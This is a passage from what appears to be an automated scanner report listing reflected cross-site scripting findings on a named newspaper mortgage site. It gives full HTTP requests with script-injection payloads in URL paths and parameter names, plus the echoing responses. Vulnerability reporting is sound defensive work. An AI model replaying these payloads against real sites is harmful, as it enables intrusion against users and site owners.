Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:35 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20104246e\"><script>alert(1)</script>71ad8bebe0b/08/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3e9c"><script>alert(1)</script>121b788efa9 was submitted in the REST URL parameter 2. This input was echoed as e3e9c\"><script>alert(1)</script>121b788efa9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/08e3e9c"><script>alert(1)</script>121b788efa9/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:41 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/08e3e9c\"><script>alert(1)</script>121b788efa9/feed/" /> ...[SNIP]...
1.341. http://mortgage.ocregister.com/2010/08/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2010/08/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed771"><script>alert(1)</script>1f1c98d951d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ed771\"><script>alert(1)</script>1f1c98d951d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/08/?ed771"><script>alert(1)</script>1f1c98d951d=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 104455
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2010 August - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/08/?ed771\"><script>alert(1)</script>1f1c98d951d=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3029"><script>alert(1)</script>458883cf61d was submitted in the REST URL parameter 1. This input was echoed as b3029\"><script>alert(1)</script>458883cf61d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010b3029"><script>alert(1)</script>458883cf61d/09/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:33 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62652
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010b3029\"><script>alert(1)</script>458883cf61d/09/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84704"><script>alert(1)</script>12779ca8568 was submitted in the REST URL parameter 2. This input was echoed as 84704\"><script>alert(1)</script>12779ca8568 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/0984704"><script>alert(1)</script>12779ca8568/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:39 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/0984704\"><script>alert(1)</script>12779ca8568/feed/" /> ...[SNIP]...
1.344. http://mortgage.ocregister.com/2010/09/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2010/09/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3512f"><script>alert(1)</script>0f889d943e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3512f\"><script>alert(1)</script>0f889d943e3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/09/?3512f"><script>alert(1)</script>0f889d943e3=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 102979
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2010 September - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/09/?3512f\"><script>alert(1)</script>0f889d943e3=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7345b"><script>alert(1)</script>a5ceac7571b was submitted in the REST URL parameter 1. This input was echoed as 7345b\"><script>alert(1)</script>a5ceac7571b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /20107345b"><script>alert(1)</script>a5ceac7571b/10/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:15 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20107345b\"><script>alert(1)</script>a5ceac7571b/10/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbcf4"><script>alert(1)</script>defd5ce1a69 was submitted in the REST URL parameter 2. This input was echoed as fbcf4\"><script>alert(1)</script>defd5ce1a69 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/10fbcf4"><script>alert(1)</script>defd5ce1a69/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:18 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/10fbcf4\"><script>alert(1)</script>defd5ce1a69/feed/" /> ...[SNIP]...
1.347. http://mortgage.ocregister.com/2010/10/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2010/10/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69fc7"><script>alert(1)</script>e6e9254e02c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 69fc7\"><script>alert(1)</script>e6e9254e02c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/10/?69fc7"><script>alert(1)</script>e6e9254e02c=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 97601
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2010 October - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/10/?69fc7\"><script>alert(1)</script>e6e9254e02c=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb8f1"><script>alert(1)</script>d0a62076da8 was submitted in the REST URL parameter 1. This input was echoed as cb8f1\"><script>alert(1)</script>d0a62076da8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010cb8f1"><script>alert(1)</script>d0a62076da8/11/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:13 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010cb8f1\"><script>alert(1)</script>d0a62076da8/11/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b677c"><script>alert(1)</script>be838dc77bd was submitted in the REST URL parameter 2. This input was echoed as b677c\"><script>alert(1)</script>be838dc77bd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11b677c"><script>alert(1)</script>be838dc77bd/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:17 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/11b677c\"><script>alert(1)</script>be838dc77bd/feed/" /> ...[SNIP]...
1.350. http://mortgage.ocregister.com/2010/11/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2010/11/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbb71"><script>alert(1)</script>e8fe4cf5fe1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fbb71\"><script>alert(1)</script>e8fe4cf5fe1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/?fbb71"><script>alert(1)</script>e8fe4cf5fe1=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98162
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2010 November - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/11/?fbb71\"><script>alert(1)</script>e8fe4cf5fe1=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbe7d"><script>alert(1)</script>9448cd28c6b was submitted in the REST URL parameter 1. This input was echoed as dbe7d\"><script>alert(1)</script>9448cd28c6b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010dbe7d"><script>alert(1)</script>9448cd28c6b/12/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:33 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62652
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010dbe7d\"><script>alert(1)</script>9448cd28c6b/12/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbf92"><script>alert(1)</script>76f411482be was submitted in the REST URL parameter 2. This input was echoed as bbf92\"><script>alert(1)</script>76f411482be in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/12bbf92"><script>alert(1)</script>76f411482be/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:34 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/12bbf92\"><script>alert(1)</script>76f411482be/feed/" /> ...[SNIP]...
1.353. http://mortgage.ocregister.com/2010/12/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2010/12/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a315"><script>alert(1)</script>fc303a44594 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3a315\"><script>alert(1)</script>fc303a44594 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/12/?3a315"><script>alert(1)</script>fc303a44594=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 116006
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2010 December - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/12/?3a315\"><script>alert(1)</script>fc303a44594=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4cbf"><script>alert(1)</script>bf63c84bd54 was submitted in the REST URL parameter 1. This input was echoed as d4cbf\"><script>alert(1)</script>bf63c84bd54 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011d4cbf"><script>alert(1)</script>bf63c84bd54/01/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
